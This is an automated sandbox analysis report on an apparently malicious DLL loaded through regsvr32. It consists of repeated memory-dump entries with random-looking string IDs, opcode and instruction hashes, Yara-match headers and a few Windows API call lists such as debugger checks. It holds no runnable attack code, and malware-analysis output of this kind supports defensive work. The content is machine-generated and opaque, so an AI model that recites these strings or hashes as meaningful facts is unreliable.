                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6w5*$EDO$V
                                                                    • API String ID: 0-1640223502
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Y()$i_"o$|Y
                                                                    • API String ID: 0-942011364
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: O)$,G$-
                                                                    • API String ID: 0-23008916
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ;U[$L$Q#
                                                                    • API String ID: 0-2933747092
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 5($<:*$qwX
                                                                    • API String ID: 0-3944236288
                                                                    • Opcode ID: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                    • Instruction ID: 7f83292775578326f1885df61e48a3f2c5c3ff73894a37d4b388f2926162ec41
                                                                    • Opcode Fuzzy Hash: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                    • Instruction Fuzzy Hash: 5B71067015878CDBEBBADF24C8897DD3BB0FB49344F90861AE84E8A250CF74574A9B41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 79&$s`~$v;
                                                                    • API String ID: 0-3844292866
                                                                    • Opcode ID: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                    • Instruction ID: c39f2861ae99e8b3f2b4a79ea52bf03a0f7a6e48d35fb935a0be7420e121cddb
                                                                    • Opcode Fuzzy Hash: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                    • Instruction Fuzzy Hash: 9B61397110478CAFDBFA9E58CC85BDD37A0FB48348F508229E9098B290DF749B4D9B46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: wQ_$1_$ac
                                                                    • API String ID: 0-1037425278
                                                                    • Opcode ID: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                    • Instruction ID: 5ab913ef515fd25bf7fc04ce61f78e9cde1e7d2fd73709943c0f3a5cbb59c84a
                                                                    • Opcode Fuzzy Hash: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                    • Instruction Fuzzy Hash: 1D612B7010978C8BDBF8CF54DC997EA3BA6FB54345F208519E84E8A270DB74968CCB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )K$U|$|1-
                                                                    • API String ID: 0-2543966960
                                                                    • Opcode ID: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
                                                                    • Instruction ID: 8eb6a9a016547b1518e90ac2546dd564535e4ecbba9ac8d240a0a1c3e9042cf5
                                                                    • Opcode Fuzzy Hash: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
                                                                    • Instruction Fuzzy Hash: 1151D57160438CAFDBF6CE64D8857CA37A0AB06354F608129A89D8A291DBB4578DCB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6|$6`d$H~z
                                                                    • API String ID: 0-1702722476
                                                                    • Opcode ID: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
                                                                    • Instruction ID: dff368548e7284a50638b46c1e9eca52edd1bdea535486c94ebb7356abcac70e
                                                                    • Opcode Fuzzy Hash: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
                                                                    • Instruction Fuzzy Hash: C351F37190074DDFCF48DFA4D98A5DEBBB0FB48308F118659E89AA7260C7B89A44CF45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: d~$`5$t>
                                                                    • API String ID: 0-1282322184
                                                                    • Opcode ID: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                    • Instruction ID: 2b9aad7a7c3990d0f54026c4e2bc5a00c5a3c031faa8fbf8ed0394cc09118e70
                                                                    • Opcode Fuzzy Hash: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                    • Instruction Fuzzy Hash: 9141B2B190078ECBCF48DFA8C88A1DE7BB0FB58358F104A19E965A6250D3B49664CF84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #St$JYr$hmn
                                                                    • API String ID: 0-1556749129
                                                                    • Opcode ID: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
                                                                    • Instruction ID: 771f7f328e054501a5ac5c786693eba7885e85f29817745d48b7f08549072e32
                                                                    • Opcode Fuzzy Hash: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
                                                                    • Instruction Fuzzy Hash: 9141A2B590038E8FCF48CF68C9865DF7BB0FB58358F104A19E866A6250D3B8D665CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: TGA$K$W}
                                                                    • API String ID: 0-588348707
                                                                    • Opcode ID: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                    • Instruction ID: 925d7415f36b0b7642ffd9188936a5d9ffa2c4cac62ef92b2c466baf2dc1674c
                                                                    • Opcode Fuzzy Hash: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                    • Instruction Fuzzy Hash: E041C2B480038E8FCB88DF68D8865DE7BB0FB58358F10461DF82AA6254D3B49664CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: :1,$@H${C=
                                                                    • API String ID: 0-2737386091
                                                                    • Opcode ID: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                    • Instruction ID: ceb57f34bb3f34c1ea772447f295c080a735f780389ac7edd693abfe49cb3e58
                                                                    • Opcode Fuzzy Hash: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                    • Instruction Fuzzy Hash: B641E6B090078E8FCF48DF68C98A5DE7BB0FB58348F104A1DE856A6250D3B4D665CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: prP$q<C$uL
                                                                    • API String ID: 0-1414207395
                                                                    • Opcode ID: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                    • Instruction ID: cc3a3a13117e67edb5dc9e3fadb8c1066889dae633948d8cd9104a976a047d4b
                                                                    • Opcode Fuzzy Hash: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                    • Instruction Fuzzy Hash: 1031B1B180434E9FCB48DF68C88A5DE7FB0FB58358F10961DE85AA6260D3789695CFC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: :00D$Kl$(R'
                                                                    • API String ID: 0-3661897330
                                                                    • Opcode ID: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                    • Instruction ID: 113703a4c5f13be184801d5493027e38acd6d1afb500234bb699672912ccf9eb
                                                                    • Opcode Fuzzy Hash: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                    • Instruction Fuzzy Hash: CA216F74618B848BD74CDF28C46551EBBE1BB8C718F440B1DF4CAAA354D778D6058B4A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _getptd.LIBCMT ref: 00007FF8CA9B597E
                                                                      • Part of subcall function 00007FF8CA9B6550: RtlCaptureContext.KERNEL32 ref: 00007FF8CA9B658F
                                                                      • Part of subcall function 00007FF8CA9B6550: IsDebuggerPresent.KERNEL32 ref: 00007FF8CA9B662D
                                                                      • Part of subcall function 00007FF8CA9B6550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8CA9B6637
                                                                      • Part of subcall function 00007FF8CA9B6550: UnhandledExceptionFilter.KERNEL32 ref: 00007FF8CA9B6642
                                                                      • Part of subcall function 00007FF8CA9B6550: GetCurrentProcess.KERNEL32 ref: 00007FF8CA9B6658
                                                                      • Part of subcall function 00007FF8CA9B6550: TerminateProcess.KERNEL32 ref: 00007FF8CA9B6666
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
                                                                    • String ID: C
                                                                    • API String ID: 1583075380-1037565863
                                                                    • Opcode ID: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
                                                                    • Instruction ID: f85f2f3bdbabe30ddcc5124bbb58825ed04916ba3a6f7c1b4db96dff09f70cb9
                                                                    • Opcode Fuzzy Hash: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
                                                                    • Instruction Fuzzy Hash: 83518352A1879281EB709E22B57A7BB6690FB84BC4F448071DE6ED7A85DE3DD009C700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale_getptd
                                                                    • String ID:
                                                                    • API String ID: 3731964398-0
                                                                    • Opcode ID: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
                                                                    • Instruction ID: fee33269eee20fbe8948e4c8b72289fbe9e07b27ec27074a0ed4289a4dffebfd
                                                                    • Opcode Fuzzy Hash: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
                                                                    • Instruction Fuzzy Hash: BE217F32B0878296EB289F25F95A3EA73A0FB88786F004171C62DC7685DF3CE0588740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale_getptd
                                                                    • String ID:
                                                                    • API String ID: 3731964398-0
                                                                    • Opcode ID: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
                                                                    • Instruction ID: ecfa9cafcc32be1e4ff600cfb302d441cd7b2f0f13508fe807f79b2839146d32
                                                                    • Opcode Fuzzy Hash: d1cd7d40a2314de2c6ade98052514a7069188fc7bc8d66beba22a864349849c0
                                                                    • Instruction Fuzzy Hash: 15216D32B08B8196DB28CF60F45A3AA73A0FB89B84F844175DA6D87394DF3CE558C740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$Y}
                                                                    • API String ID: 0-941771097
                                                                    • Opcode ID: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                    • Instruction ID: b5fbb9b8d69d65623167db00d7c984f611664f17b2ba8ffe1295fa2c65075a94
                                                                    • Opcode Fuzzy Hash: ccf5b1dce74faba3fe2a090267a66303c79afc7ef0f7a8852e8ee526979540e5
                                                                    • Instruction Fuzzy Hash: BFD11771D0475C8BDBA9CFA4C58A6DDBBB0FF48304F14812ED406AA664DBB4A94ACF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 7;}~$?C
                                                                    • API String ID: 0-2633536567
                                                                    • Opcode ID: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                    • Instruction ID: 4ff8dde17651611a765cac66b1fbb421dc2d9ab68fb3aea537ff971927bbf4a2
                                                                    • Opcode Fuzzy Hash: 9e9477893eee9c26855422b11b358c2b9c7e89ea64d6e27a9c9a45e4b3e49bc9
                                                                    • Instruction Fuzzy Hash: 78D1157090074CEBCB98DF28C8CA6DD7FA0FF443A4FA06119FA5696250D7719989CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 5"*$Wu
                                                                    • API String ID: 0-3407213400
                                                                    • Opcode ID: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                    • Instruction ID: 3c96fdf1381a0958c8520d7d71fe6f2c88625533ee613de06fa48a87f48c4e54
                                                                    • Opcode Fuzzy Hash: 590a19696181e1204ae7455af11f8a1d001dcd1a3fed74675f5c17178e0ac61d
                                                                    • Instruction Fuzzy Hash: C5D1347150160CDBCBA9DF38C0896D93BE1FF68314F606229FC26962A6C770D998CB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: F/|$]M
                                                                    • API String ID: 0-4182351379
                                                                    • Opcode ID: 6ca5dc36d9275e72bb52b2201a87e4efd5e3077112f043bed35ba482a866e2ca
                                                                    • Instruction ID: a7a3ffa63f459c2793369717af269d13be5e973408dad35b7fec4159c22d1286
                                                                    • Opcode Fuzzy Hash: 6ca5dc36d9275e72bb52b2201a87e4efd5e3077112f043bed35ba482a866e2ca
                                                                    • Instruction Fuzzy Hash: 93C1FC7590574CCFDBAACF28C4896DA3BE4FF18348F104129FC1A96262C778E959CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ;SH$nK
                                                                    • API String ID: 0-1681473137
                                                                    • Opcode ID: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
                                                                    • Instruction ID: 2d779165796623b26e7721dc1da123eca1e5f2af18f65828867eec0b4a65172d
                                                                    • Opcode Fuzzy Hash: 60009ad1e2a9263792ce168a39eeae7aea84bb316664056338e5cad3c2547986
                                                                    • Instruction Fuzzy Hash: A4A1F6B1D047188FDB69DFA9C8896DDBBF0FB58308F20821DE456AB252DB70A945CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,$z
                                                                    • API String ID: 0-3532108746
                                                                    • Opcode ID: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
                                                                    • Instruction ID: 22c424daf7001e4089cf159549a6bd5e686fa177ee3286ce9bb9aa7af20863be
                                                                    • Opcode Fuzzy Hash: dc10c8488ddee61f5c5f049ba36fdd234a8a1d33d2b4922d6dc47400662f32e6
                                                                    • Instruction Fuzzy Hash: D8813B7050064ECFDB99CF28C8967DE3BA0FB58388F214219FC469A251D778DA99CBC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: g/?$~l;
                                                                    • API String ID: 0-1448562259
                                                                    • Opcode ID: d2040acbbcff242154b89f912e397b4bdfd0b20ea052fb69228554049ff3a845
                                                                    • Instruction ID: 3fbc9289fec6fa85948f8c66d04cee19a314a674a1b98c47510047b5f8856774
                                                                    • Opcode Fuzzy Hash: d2040acbbcff242154b89f912e397b4bdfd0b20ea052fb69228554049ff3a845
                                                                    • Instruction Fuzzy Hash: BD912570D0871C8BDF98CFA8D4896DEBBF0FB48314F108119E815B6261D7788A49CF69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: JM$S
                                                                    • API String ID: 0-422059844
                                                                    • Opcode ID: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
                                                                    • Instruction ID: 18b4f90d7ab76b898621194cab333307634bf3b6742180ea4845374ffda8c285
                                                                    • Opcode Fuzzy Hash: 17c06aff4c9a8785a284e06d6c25610082a70a687229394e7dafcb554760f06a
                                                                    • Instruction Fuzzy Hash: 58813B715047888BDBB8DF34C8863D93BE1FB54348F60821DEC9ACA262DB74954ADB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \4t$sT>
                                                                    • API String ID: 0-514966222
                                                                    • Opcode ID: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
                                                                    • Instruction ID: befa5a9d8a747e28c49f4c6f85c9bef8e8333281f143cc702ee02b151a4c5a7a
                                                                    • Opcode Fuzzy Hash: bb5024ce5ec3974a1f347232039341d65ca55b368bc4e02a847ae3966b55dd21
                                                                    • Instruction Fuzzy Hash: 689178B550070DCFDB98CF28C18A59E3BE8FB49318F40412AFC1E9A264E7B4E519CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6 zT$lh
                                                                    • API String ID: 0-3667112246
                                                                    • Opcode ID: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
                                                                    • Instruction ID: 045a3dc0dd112cd33074149f38d13d5bd37ef25ad135160f9863638738ef0602
                                                                    • Opcode Fuzzy Hash: 3243651aebf4cc17f9c3ac19081b739ce8b4ee13b4845d7785784d3dcbf37647
                                                                    • Instruction Fuzzy Hash: 27811A7050478C8FDBBADF64C8AA7CA7BB0FB59304F504219EA4D8A261DB749749CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 2Q'$t<p
                                                                    • API String ID: 0-2959822804
                                                                    • Opcode ID: b2351d3b708b15bcd3604af59b95d6174f592116e14d9e00cc8b524fb472ed52
                                                                    • Instruction ID: a41fe1ae69e2ef788ca0c35fa62602b5835247be5e9f8fb85ac316e89f41683a
                                                                    • Opcode Fuzzy Hash: b2351d3b708b15bcd3604af59b95d6174f592116e14d9e00cc8b524fb472ed52
                                                                    • Instruction Fuzzy Hash: 30612671D0074E8BDF99DFA9C44A6EEBBB0FB58344F208119E415B7250CB788A49CF92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 95s$\`s
                                                                    • API String ID: 0-3495284040
                                                                    • Opcode ID: 588b54260dd6ab6c7a0d8fdad9ba33054619fea491f2d0c2f65b47850ec72611
                                                                    • Instruction ID: 5af2ad2f129eee824c5b1b43ddda8a3f0e9306f12771263eefccbe9bdf0da5be
